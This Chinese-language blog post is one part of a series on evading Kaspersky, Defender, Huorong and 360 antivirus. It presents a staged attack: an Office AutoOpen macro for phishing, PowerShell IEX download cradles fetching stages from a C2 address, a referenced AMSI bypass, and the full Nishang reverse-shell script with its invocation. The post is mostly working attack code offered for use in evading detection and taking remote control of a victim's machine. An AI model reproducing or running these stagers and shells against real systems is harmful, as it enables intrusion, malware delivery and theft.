卡巴defender火绒360免杀十种方法8: 化整为零

预览

环境

• 带有 Ubuntu Linux AMI 的 AWS EC2 作为攻击者 C2 服务器。

• 带有 Windows Server 2019 AMI 的 AWS EC2 作为受害者机器。

• 安装 Visual Studio 2022 社区的本地 Windows 10 计算机用于恶意软件开发和编译

• 本地 Kali Linux 攻击机。

过程

无论如何将有效载荷化整为零分成不同执行阶段都不是新技术，威胁参与者通常使用它来传播可以绕过初始静态分析的恶意软件。这是因为真正的恶意负载将在稍后阶段解码和执行，静态分析可能没有机会发挥作用。

对于此 PoC，将展示一种非常简单但有效的方法来分解反向 shell 负载，例如，可用于使用以下宏创建恶意 Office 文件：

执行第一阶段的宏

Sub AutoOpen()Set shell_object = CreateObject("WScript.Shell")shell_object.Exec ("powershell -c IEX(New-Object Net.WebClient).downloadString('http://IP:PORT/stage1.ps1')")End Sub

当然，这不会被 AV 静态检测到，因为它只是在执行一个看似良性的命令。

由于实验机器没有安装 Office，将通过在 PowerShell 脚本中手动执行上述命令来模拟网络钓鱼过程。

最后，本节的PoC如下：

• stage0.txt（这将是在网络钓鱼宏中执行的命令）

IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/stage1.txt")

• stage1.txt

IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/ref.txt")IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/stage2.txt")

• stage2.txt

function Invoke-PowerShellTcp { <#.SYNOPSISNishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTIONThis script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.The script is derived from Powerfun written by Ben Turner & Dave Hardy.PARAMETER IPAddressThe IP address to connect to when using the -Reverse switch..PARAMETER PortThe port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens..EXAMPLEPS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLEPS > Invoke-PowerShellTcp -Bind -Port 4444Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLEPS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must belistening on the given IP and port. .LINKhttp://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.htmlhttps://github.com/nettitude/powershell/blob/master/powerfun.ps1https://github.com/samratashok/nishang#>          [CmdletBinding(DefaultParameterSetName="reverse")] Param(        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]        [String]        $IPAddress,        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]        [Int]        $Port,        [Parameter(ParameterSetName="reverse")]        [Switch]        $Reverse,        [Parameter(ParameterSetName="bind")]        [Switch]        $Bind    )        try     {        #Connect back if the reverse switch is used.        if ($Reverse)        {            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)        }        #Bind to the provided port if Bind switch is used.        if ($Bind)        {            $listener = [System.Net.Sockets.TcpListener]$Port            $listener.start()                $client = $listener.AcceptTcpClient()        }         $stream = $client.GetStream()        [byte[]]$bytes = 0..65535|%{0}        #Send back current username and computername        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")        $stream.Write($sendbytes,0,$sendbytes.Length)        #Show an interactive PowerShell prompt        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')        $stream.Write($sendbytes,0,$sendbytes.Length)        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)        {            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding            $data = $EncodedText.GetString($bytes,0, $i)            try            {                #Execute the command on the target.                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )            }            catch            {                Write-Warning "Something went wrong with execution of command on the target."                 Write-Error $_            }            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '            $x = ($error[0] | Out-String)            $error.clear()            $sendback2 = $sendback2 + $x            #Return the results            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)            $stream.Write($sendbyte,0,$sendbyte.Length)            $stream.Flush()          }        $client.Close()        if ($listener)        {            $listener.Stop()        }    }    catch    {        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."         Write-Error $_    }}Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80

这里有几件事要注意。首先，ref.txt 是一个简单的 PowerShell AMSI 绕过，它允许当前的 PowerShell 进程修补内存中 AMSI 扫描。此外，在这种情况下，PowerShell 脚本的扩展名无关紧要，因为它们的内容将作为文本简单地下载并使用 Invoke-Expression（IEX 的别名）调用。

然后可以执行完整的 PoC，如下所示：

• 在受害机器中执行阶段 0

• 受害机器从 C2 下载阶段

• 在攻击者服务器中获取反向 shell

请点一下右下角的“在看”，谢谢！！

请帮忙点赞， 谢谢！！

请帮忙转发，谢谢！！

暗号: 022255